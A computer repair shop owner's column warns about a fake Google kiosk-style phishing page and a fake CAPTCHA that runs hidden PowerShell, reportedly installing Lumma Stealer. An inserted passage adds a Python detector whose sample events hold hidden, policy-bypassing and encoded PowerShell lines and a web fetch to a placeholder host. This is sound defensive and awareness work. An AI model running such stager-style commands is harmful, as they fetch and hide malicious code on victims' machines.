This is one of my most important articles and should be shared with friends and family. This week I dissected two very dangerous internet hoaxes that are designed to steal your identity and install malware on computers. Both are new to me, and based on my research, are fairly new threats. It’s imperative you’re familiar with them so you can reduce your chances of being scammed.
Google Kiosk
A person came in with what she thought was a finicky Google website. After entering her email address and password several times the screen still did not close. She came in thinking it was a pretty easy fix, but after analyzing her system I realized it was a phishing website disguised as a legitimate Google page.
In a nutshell, malicious code is injected into the browser which makes the page full screen – imitating Google in kiosk mode. There is nothing to click past or out of on the screen. The code makes the browser full screen with no borders or frames and looks like the Google login screen one might use at an internet kiosk.
Based on my customer’s browser history the code came from an infected or purposefully malicious website. My customer was looking up local events when she came across the website. Similar to the Microsoft hoax I wrote about earlier, the fake login screen injects itself as soon as it’s opened.
There is minimal risk from the page itself. There is, however, a true risk in entering your Google credentials. As soon as they’re entered the username and password are sent to the scammer.
If you came across a page that looks like the one above and entered your information, it’s imperative you change your Google password immediately. It’s also very important that you enable two-factor authentication on your account; Google publishes step-by-step instructions for turning it on. Your email usually contains personal information about you and your account information that criminals can use to scam you. Additionally, many users also upload documents and pictures to their Google cloud account.
Fake CAPTCHA
This one took me a while to figure out. My customer came in with her son who was complaining about the computer constantly popping up PowerShell screens while he was playing his video games. It’s not normal for gamers to have viruses on their computer, which is why this one was a little perplexing to diagnose.
We’ve all seen the CAPTCHA prompts that make us prove we’re human and not a robot. For most of us it’s fairly normal to check the box and move forward. CAPTCHA is designed to be a simple test to make sure a human is actually behind the keyboard and not a machine or computer.
Fake CAPTCHA, for lack of a better name, imitates the real one but provides additional instructions after the box is checked. Usually the instructions are to push a combination of keys. The real CAPTCHA doesn’t make us take additional steps. This should be a red flag.
This is really nasty because it executes scripts behind the scenes that run within PowerShell – a Windows-based command shell used for executing code. From what I could tell it appears to install Lumma Stealer or some variant of it. The data in PowerShell appears to be encrypted, which made it hard to detect and somewhat difficult for me to remove. Lumma Stealer uploads data from the computer to a remote location without user consent.
I was able to delete the Lumma Stealer virus with a combination of manual scanning and automated software. Automated software alone did not delete the virus completely. I duplicated the virus on my computer and the antivirus software seemed to prevent the virus from infecting my test machine.
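The article does not include the PowerShell command the fake CAPTCHA asked the son to run, so the following is an added example of my own (not the author’s code and not taken from the customer’s machine) showing how a defender might review process-creation logs for launches that fit the pattern described above: PowerShell started from the desktop shell rather than from a terminal or a script, with a hidden window, an encoded or policy-bypassing command line, or a fetch from the web. The log line format, the sample events, the placeholder domain example.invalid and the scoring threshold are all assumptions constructed for this example.

```python
"""Flag process-creation events consistent with the fake-CAPTCHA
"press these keys" infection path.

Assumed log shape (constructed for this example, not a real product's format):
    <timestamp> parent=<image> image=<image> cmd="<command line>"
"""
import re
from dataclasses import dataclass

# Constructed sample events. The base64 blob decodes to the harmless
# UTF-16 string "ABCDEFGHIJKL"; the domain is a reserved placeholder.
SAMPLE_EVENTS = [
    '2024-05-01T10:00:01 parent=explorer.exe image=powershell.exe '
    'cmd="powershell -w hidden -ep bypass -enc QQBCAEMARABFAEYARwBIAEkASgBLAEwA"',
    '2024-05-01T10:02:15 parent=cmd.exe image=powershell.exe '
    'cmd="powershell Get-ChildItem C:\\Users"',
    '2024-05-01T10:03:40 parent=explorer.exe image=powershell.exe '
    'cmd="powershell -NoProfile -File C:\\Scripts\\backup.ps1"',
    '2024-05-01T10:04:05 parent=explorer.exe image=notepad.exe '
    'cmd="notepad.exe notes.txt"',
    '2024-05-01T10:05:30 parent=explorer.exe image=powershell.exe '
    'cmd="powershell -w hidden Invoke-WebRequest http://example.invalid/placeholder"',
]

LINE_RE = re.compile(
    r'^(?P<ts>\S+)\s+parent=(?P<parent>\S+)\s+image=(?P<image>\S+)\s+cmd="(?P<cmd>.*)"$'
)

# Each indicator is an ordinary, documented PowerShell switch or cmdlet.
# None is malicious on its own; several together in a process launched
# from the desktop shell is what makes an event worth a look.
INDICATORS = [
    ("hidden-window", re.compile(r"-w(?:indowstyle)?\s+hidden", re.I)),
    ("encoded-command",
     re.compile(r"(?:^|\s)-e(?:c|nc|ncodedcommand)?\s+[A-Za-z0-9+/=]{20,}", re.I)),
    ("policy-bypass", re.compile(r"-e(?:xecutionpolicy|p)\s+bypass", re.I)),
    ("remote-fetch",
     re.compile(r"\b(?:iwr|invoke-webrequest|invoke-expression|iex|downloadstring)\b", re.I)),
]


@dataclass
class Finding:
    timestamp: str
    parent: str
    command: str
    indicators: list


def parse_event(line):
    """Return the event fields as a dict, or None if the line does not parse."""
    m = LINE_RE.match(line)
    return m.groupdict() if m else None


def assess_event(event):
    """Return the list of indicator labels that apply to one parsed event."""
    if event["image"].lower() not in ("powershell.exe", "pwsh.exe"):
        return []
    hits = [label for label, rx in INDICATORS if rx.search(event["cmd"])]
    # The Run dialog (Win+R) launches children under explorer.exe, so a
    # PowerShell process with that parent, rather than a terminal or a
    # scheduled task, is itself a signal in this scenario.
    if event["parent"].lower() == "explorer.exe":
        hits.append("launched-from-explorer")
    return hits


def find_suspicious(lines, threshold=2):
    """Return Findings for events with at least `threshold` indicators."""
    findings = []
    for line in lines:
        event = parse_event(line)
        if event is None:
            continue
        hits = assess_event(event)
        if len(hits) >= threshold:
            findings.append(Finding(event["ts"], event["parent"], event["cmd"], hits))
    return findings


if __name__ == "__main__":
    for f in find_suspicious(SAMPLE_EVENTS):
        print(f.timestamp, f.parent, ", ".join(f.indicators))
        print("   ", f.command)
```

Run against the constructed sample, the first and last events are flagged; the administrator’s backup script launched from a desktop shortcut scores only one indicator and is left alone, which is why the threshold matters: a hidden window or a download on its own is common in legitimate automation, but combined with a Run-dialog parent it matches the behaviour the customer’s son described.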
Conclusion
Both of these viruses are disturbing because they do away with the alarming behavior of the Microsoft Scam, which makes noise and flashes. Instead, these closely mimic internet things we’re used to seeing and interacting with. The simple reality is that most people use Google and Gmail regularly and are used to entering their credentials. Without thinking, we check the CAPTCHA box to advance to the next page.
My suggestion is to keep an eye out for things that seem out of place and keep your antivirus software up-to-date.
Jeromy is the President of Laptop & Computer Repair, Inc. He can be reached through the website at https://www.localcomputerwiz.com